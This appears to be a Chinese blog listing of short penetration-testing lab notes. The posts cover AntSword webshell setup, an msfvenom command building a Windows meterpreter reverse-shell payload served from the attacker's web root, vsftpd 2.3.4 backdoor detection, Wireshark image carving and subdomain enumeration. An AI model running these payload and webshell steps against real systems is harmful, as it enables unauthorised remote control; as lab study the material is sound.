- 博客(7)
- 收藏
- 关注
原创 中国蚁剑使用
3.打开中国蚁剑,右键添加数据,url填写,密码是一句话木马中POST包含的内容,这里是1,测试连接,连接成功。2.开启apache服务(不开启会导致物理机上中国蚁剑测试连接失败)1.打开Kali虚拟机,创建一句话木马文件。4.添加数据后打开,如下图所示。
2024-11-08 10:52:56 102
原创 Lhost 与Lport
LHOST(Local Host):这是攻击者的本地IP地址,即执行Metasploit或其他攻击工具的计算机的IP地址。3. 如果需要进行外网测试,可能需要配置端口转发(在路由器上)或将LHOST设置为你的公网IP地址,并确保LPORT在防火墙上开放。在信息安全领域,特别是在渗透测试和恶意软件开中,"LHOST"和"LPORT"是常见的术语,通常与Metasploit框架相关联。这通常意味着使用桥接模式或NAT网络模式。2. 如果你的虚拟机是内部网络的一部分,LHOST将是虚拟机的内部IP地址。
2024-10-31 15:41:28 405
原创 Kali中生成被控端,启动主控端
1.输入:msfvenom -p windows/meterpreter/reverse_tcp lhost= ip地址 lport=5000 -f exe -o var/www/html/payload.exe在攻击者的机器上,需要设置一个监听器来接收来自被控端的反向连接。4.打开windows xp虚拟机系统,进入Internet,输入 ip /payload.exe,保存,运行,返回kali即可查看信息。5.把文件放到www.virustotal.com检测。2.启动apache2。
2024-10-31 14:45:09 401
原创 Python脚本检测笑脸漏洞
这个漏洞允许攻击者在登录时,连接带有vsftpd 2.3.4版本的服务器的21端口时,通过在用户名后输入特殊字符“:)”(类似笑脸的符号),从而触发漏洞。当输入这个特殊字符时,vsftpd服务会在目标系统上开启一个监听在6200端口的后门,攻击者可以利用这个后门直接执行系统命令。例如,攻击者可以首先使用nmap工具扫描目标系统的服务版本,然后通过Metasploit的利用模块或者直接使用nc工具连接到开启的6200端口,从而实现远程命令执行。print("完成登录检测")print("存在微笑漏洞")
2024-10-31 10:58:19 233
原创 对等保2.0的理解
它是在原网络安全等级保护制度(简称等保1.0)的基础上,根据《中华人民共和国网络安全法》的要求,结合当前网络安全形势和技术发展趋势,进行升级和完善后的产物。2. 保护对象扩展:等保1.0主要针对的是关键信息基础设施,而等保2.0的保护对象扩展到了所有的网络运营者,这意味着无论是政府机构、企业还是其他组织,只要运营网络,都需要遵守等级保护制度。8. 技术标准更新:等保2.0更新了相关的技术标准和要求,使其更加贴近当前的网络技术发展现状,增加了云计算、大数据、物联网等新技术领域的安全要求。
2024-10-30 16:47:33 124
原创 利用Wireshark捕获手机发送到电脑的QQ流量(图片)
打开Wireshark和电脑QQ,进入Wireshark流量捕获,首先选择过滤字符串,输入自己的QQ号,确认找到QQ号后,查询连接网络的IP地址,利用ip.src==网络IP地址。用手机QQ向电脑发送.jpg样式的图片,过滤十六进制值FFD8,找到内容。保存,然后用WinHex打开,删除FFD8的前缀。首先确保手机和电脑处于同一个局域网下。追踪tcp流,显示原始数据。
2024-10-17 17:10:54 200
原创 【无标题】与ZoomEye功能类似的搜索引擎和一些常用的子域名收集方法:
2. Shodan:被称为“黑客的谷歌”,Shodan搜索互联网上连接的服务器、摄像头、打印机、路由器等设备,收集并展示这些设备的信息。1. FOFA:由中国团队白帽汇开发的网络空间搜索引擎,提供了强大的搜索功能,帮助安全研究人员发现和了解网络资产。3.使用DNS查询工具,如 dig 、 nslookup ,进行DNS区域传输尝试,获取子域名信息。2.工具如ZoomEye、FOFA、Shodan等可以用来搜索特定域名的子域名。
2024-10-08 22:13:36 140
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人